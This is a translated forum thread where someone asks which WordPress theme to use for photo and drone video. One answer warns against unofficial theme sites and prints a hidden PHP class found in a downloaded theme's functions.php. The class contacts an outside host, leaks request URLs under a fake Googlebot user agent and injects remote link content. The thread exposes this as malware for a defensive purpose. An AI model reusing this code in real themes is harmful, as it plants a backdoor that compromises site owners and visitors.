S
S
Sergey2016-06-28 17:16:18
Video
Sergey, 2016-06-28 17:16:18

How to choose a Template on WP?

Hello! I am very interested in the topic of creating your own website. Over the past few months, I have read a lot of information on template installation, basic programming, online advertising, usability, etc.
As a result, I chose WP CMS, as it is very easy to use and finish.
There are quite a large number of templates on wp-templates.ru and many of them look attractive from the front, but I spent a day searching and got really stuck in them.
Now to the essence of the question: Please tell me which one is easier and better to use for uploading photos and video content (I am shooting events from a quadrocopter).
Thank you in advance

Answer the question

In order to leave comments, you need to log in

6 answer(s)
D
Dmitry, 2016-06-28
@dimasmagadan

a few rules to reduce problems in future work:
1 do not download templates from incomprehensible sites
2 download a template from the official repository, buy a template from an official seller, or (if you know how) make it yourself.
why so:
https://roem.ru/25-08-2014/109498/bolshe-poloviny-...
otherwise, there is no fundamental difference in taking just some kind of template: any template can be sharpened specifically for your topic.
specifically on the site wp-templates.ru
downloaded an arbitrary template from their main page (downloaded the Cardio template). functions.php file has this code

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

         $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}

allows you to access your site remotely.
nothing prevents you from using such sites to select a suitable template.
but it is better to install a copy from the official repository on your site.
well, or contact me - for a little money I will clean the template from holes / links, or later for a slightly larger amount I will clean it from viruses)
But better, I repeat, immediately download exactly the same template from the official repository for free

L
lere, 2016-07-22
@lere

Be sure to check any downloaded theme with the TAC plugin.

Y
Yakov Vylegzhanin, 2016-06-28
@vylegzhanin

Under the photo, for example
wp-templates.ru/category/foto

D
Dim Boy, 2016-06-28
@twix007

find on temporest or codecanyon by tags and tags

S
Sergey, 2016-06-28
@sergeyvidioreg

Boyko, I went through the category first of all) The essence of the question is, can you advise any specific template?

M
Mr Crabbz, 2016-06-28
@Punkie

The choice of a specific template is an exclusively individual task and depends 100% on your taste preferences.

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question